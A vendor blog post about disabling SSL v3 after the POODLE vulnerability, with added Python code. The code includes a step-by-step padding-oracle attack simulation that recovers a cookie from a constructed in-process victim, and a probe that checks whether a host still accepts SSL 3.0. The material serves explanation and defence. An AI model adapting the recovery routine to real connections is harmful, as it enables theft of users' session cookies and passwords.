Bronto Response to POODLE Vulnerability

Damian Trzebunia

If you are a Bronto customer or partner using the Bronto API in any way, including self-built or pre-packaged integrations, please read this blog post and forward it to your API developer or integration provider for their awareness.

Please note that this blog post does not concern a vulnerability or bug in Bronto’s software. Bronto, being a software-as-a-service platform, relies on a host of internet protocols, and when a vulnerability is exposed in one of those protocols, it could impact the users of the Bronto Marketing Platform. This is simply our precautionary response to one such vulnerability to help minimize any risk to your Bronto account. Bronto’s software has not been compromised in any way.

What is POODLE?

POODLE (Padding Oracle On Downgraded Legacy Encryption) is a serious vulnerability in the SSL Version 3.0 protocol. An attacker positioned between a browser and a website (for example on an open wireless network) who can also make that browser send many requests can use it to decrypt confidential data from the connection one byte at a time, most importantly session cookies and passwords, and then use what was recovered to access the user’s private account data on the website.

POODLE is a design flaw in SSL 3.0 itself (the padding at the end of each encrypted record is neither covered by the integrity check nor fully verified by the receiver), so there is no patch that fixes SSL 3.0; the only remedy is to stop using it. Any website that supports SSL v3 is vulnerable to POODLE, even if it also supports more recent versions of TLS, because an attacker who interferes with the connection setup can make browsers fall back to SSL v3 (the “downgraded” in the name). As SSL Version 3.0 is no longer secure, Bronto must disable support for it to ensure Bronto customers use more modern security protocols to avoid compromising users’ private information.

Please see the CERT alert on POODLE (tracked as CVE-2014-3566) for more information.
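To make concrete what the “padding oracle” in the name means, the following is an added simulation of the SSL 3.0 record layer and the POODLE decryption step; it is example code written for this page, not code from the original post or from Bronto. Assumptions: a toy Feistel block cipher stands in for AES, HMAC-SHA256 truncated to 20 bytes stands in for SSL 3.0’s MAC, the victim “browser” and the “server” are constructed in-process, and the secret cookie value is made up. The attack mirrors the real one: the attacker aligns one unknown byte to the last position of a CBC block, forces a request whose final block is nothing but padding, then copies the target block over that final block. Because an SSL 3.0 receiver checks only the padding-length byte, the server accepts roughly once per 256 attempts, and each acceptance reveals one byte.

```python
import hashlib
import hmac
import os
import random

BLOCK = 16     # block size of the stand-in cipher (AES has the same)
MAC_LEN = 20   # SSL 3.0's MAC is 20 bytes (SHA-1 based); HMAC-SHA256 truncated to 20 stands in

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 16-byte block cipher: a 4-round Feistel network keyed through SHA-256.
# It is a keyed permutation, which is all CBC needs for the demonstration; it is NOT secure.
def _f(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def encrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r

def decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = b"", iv
    for k in range(0, len(data), BLOCK):
        prev = encrypt_block(key, _xor(data[k:k + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, data):
    out, prev = b"", iv
    for k in range(0, len(data), BLOCK):
        out += _xor(decrypt_block(key, data[k:k + BLOCK]), prev)
        prev = data[k:k + BLOCK]
    return out

def _mac(mac_key, data):
    return hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]

def ssl3_seal(key, mac_key, plaintext, rng):
    """Sender: plaintext || MAC || padding || padding-length byte, then CBC. The MAC does not
    cover the padding, and SSL 3.0 lets the padding bytes be anything (here: random)."""
    body = plaintext + _mac(mac_key, plaintext)
    pad_len = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
    body += bytes(rng.getrandbits(8) for _ in range(pad_len)) + bytes([pad_len])
    iv = bytes(rng.getrandbits(8) for _ in range(BLOCK))
    return iv, cbc_encrypt(key, iv, body)

def ssl3_open(key, mac_key, iv, ciphertext):
    """Receiver: SSL 3.0 checks only that the padding-length byte is below the block size,
    never the padding bytes' contents. Its accept/reject answer is the oracle POODLE exploits."""
    body = cbc_decrypt(key, iv, ciphertext)
    pad_len = body[-1]
    if pad_len >= BLOCK or len(body) - pad_len - 1 < MAC_LEN:
        return False
    body = body[:-(pad_len + 1)]
    return hmac.compare_digest(body[-MAC_LEN:], _mac(mac_key, body[:-MAC_LEN]))

def make_session(secret, seed=0):
    """Constructed victim: a browser under attacker-controlled JavaScript sends requests of
    attacker-chosen filler around a secret cookie; the server answers accept/reject only."""
    rng = random.Random(seed)
    key, mac_key = os.urandom(16), os.urandom(16)   # never seen by the attacker
    def victim_send(prefix_len, suffix_len):
        return ssl3_seal(key, mac_key, b"A" * prefix_len + secret + b"B" * suffix_len, rng)
    def server_accepts(iv, ciphertext):
        return ssl3_open(key, mac_key, iv, ciphertext)
    return victim_send, server_accepts

def recover_secret_byte(j, secret_len, victim_send, server_accepts, max_tries=50000):
    """Align secret[j] to the last byte of a block and make the final block pure padding,
    then copy the target block over the final block. The server accepts only when the
    decrypted last byte equals BLOCK-1 (about 1 try in 256), and that leaks the byte."""
    prefix_len = (BLOCK - 1 - j) % BLOCK
    suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK
    target = (prefix_len + j) // BLOCK                # plaintext block P_target holds secret[j]
    for tries in range(1, max_tries + 1):
        iv, ct = victim_send(prefix_len, suffix_len)
        blocks = [iv] + [ct[k:k + BLOCK] for k in range(0, len(ct), BLOCK)]   # blocks[m+1] encrypts P_m
        if server_accepts(iv, ct[:-BLOCK] + blocks[target + 1]):
            # P_target XOR C_{target-1} XOR C_{n-1} ended in BLOCK-1; solve for P_target's last byte
            return (BLOCK - 1) ^ blocks[target][-1] ^ blocks[-2][-1], tries
    raise RuntimeError("server never accepted a tampered record")

def recover_secret(secret_len, victim_send, server_accepts):
    """Recover the whole cookie byte by byte; also returns the number of forced requests."""
    out, total = bytearray(), 0
    for j in range(secret_len):
        byte, tries = recover_secret_byte(j, secret_len, victim_send, server_accepts)
        out.append(byte)
        total += tries
    return bytes(out), total
```

Calling `recover_secret(6, *make_session(b"sid=42"))` returns the constructed cookie after roughly 256 forced requests per byte, without the attacker ever learning a key. A TLS 1.0 or later receiver, which requires every padding byte to equal the padding length, would reject almost all of the tampered records, and the leak disappears; that is why disabling SSL v3 is the fix.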

What is Bronto doing about POODLE?

On March 8, 2015, Bronto will disable support for SSL v3, the outdated protocol that is vulnerable to the POODLE bug. Most Bronto customers will not see any impact when SSL v3 is disabled on their Bronto website, since all currently supported browsers will automatically use newer and more secure versions of TLS. Most Bronto API integrations will also continue to work.

However, it is possible that this change may break API integrations for some customers because the SSL libraries they use either force the use of SSL v3 or don’t automatically upgrade to newer, better protocols.

What Must Bronto Customers Do?

Bronto customers should ensure that their integrations use SSL/TLS libraries that support the newer versions of TLS, configure those libraries so that SSL v3 is never offered, and stop any remaining use of SSL v3 immediately rather than waiting for the cut-off date. The practical test is to confirm that an integration still connects with SSL v3 disabled on the client side, and that the server it talks to refuses an SSL v3 connection.
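Two checks a developer would want before the cut-off date, as an added example (written for this page, not Bronto’s own tooling or API client code): first, whether a given host still accepts SSL 3.0, and second, a client-side TLS configuration that cannot fall back to it. Because modern OpenSSL builds no longer support SSL 3.0 at all, the probe does not rely on `openssl s_client -ssl3`; it writes a raw SSL 3.0 ClientHello record over a socket and interprets the first record that comes back. The cipher-suite list, the host name and the chosen TLS 1.2 floor are assumptions; the post itself only says that SSL v3 will be disabled.

```python
import os
import socket
import ssl
import struct
import time

SSLV3 = b"\x03\x00"
# A few cipher suites an SSL 3.0 server would normally accept (IANA values); assumed list.
SSLV3_SUITES = (0x002F, 0x0035, 0x000A, 0x0005)

def build_sslv3_client_hello(random_bytes=None, suites=SSLV3_SUITES):
    """Return one complete SSL 3.0 ClientHello record (SSL 3.0 has no extensions)."""
    if random_bytes is None:
        random_bytes = struct.pack("!I", int(time.time())) + os.urandom(28)
    if len(random_bytes) != 32:
        raise ValueError("ClientHello random must be 32 bytes")
    suite_bytes = b"".join(struct.pack("!H", s) for s in suites)
    body = (SSLV3                                        # client_version
            + random_bytes
            + b"\x00"                                    # empty session_id
            + struct.pack("!H", len(suite_bytes)) + suite_bytes
            + b"\x01\x00")                               # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body          # HandshakeType client_hello
    return b"\x16" + SSLV3 + struct.pack("!H", len(handshake)) + handshake   # ContentType handshake

def classify_server_response(data):
    """Interpret the first record a server returns for an SSL 3.0 ClientHello."""
    if not data:
        return "refused: connection closed without a response"
    if data[0] == 0x15 and len(data) >= 7:                         # alert record
        level, desc = data[5], data[6]
        name = {40: "handshake_failure", 70: "protocol_version"}.get(desc, f"alert {desc}")
        return f"refused: {name} (level {level})"
    if data[0] == 0x16 and len(data) >= 11 and data[5] == 0x02:    # handshake record, server_hello
        version = data[9:11]
        if version == SSLV3:
            return "ACCEPTED: server negotiated SSL 3.0 (POODLE-exposed)"
        return f"refused: server answered with version 0x{version.hex()}"
    return f"unknown: content type 0x{data[0]:02x}"

def probe_sslv3(host, port=443, timeout=5.0):
    """Connect, offer only SSL 3.0, and report how the server responds."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv3_client_hello())
        try:
            data = sock.recv(4096)
        except (ConnectionResetError, socket.timeout):
            data = b""
    return classify_server_response(data)

def make_tls_client_context(minimum=ssl.TLSVersion.TLSv1_2):
    """Client-side fix: a context that never offers SSL 2/3 and, by default, nothing below TLS 1.2."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = minimum
    return ctx

if __name__ == "__main__":
    import sys
    print(probe_sslv3(sys.argv[1]))   # e.g. python poodle_probe.py api.example.com (hypothetical host)
```

A host that has dropped SSL v3 answers with a `protocol_version` or `handshake_failure` alert, or simply closes the connection; a `ServerHello` carrying version 0x0300 means SSL v3 is still enabled. On the client side, pass the context from `make_tls_client_context()` to whatever HTTPS client the integration uses (for example `http.client.HTTPSConnection(host, context=ctx)`); if the integration uses a library that cannot be given a TLS floor, that library is the one the post warns about.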

If you have any specific questions or concerns, please reach out to your Account Manager.

7 Responses to “Bronto Response to POODLE Vulnerability”

  1. Charles Fu

    Will Bronto be supporting TLS 1.0? Or will TLS 1.1 or TLS 1.2 be required?

  2. Will you support TLS 1.0, or will you require TLS 1.1 or TLS 1.2? This is a very important detail to include, because 1.1 or 1.2 will require major upgrades (at least for us). Thanks!

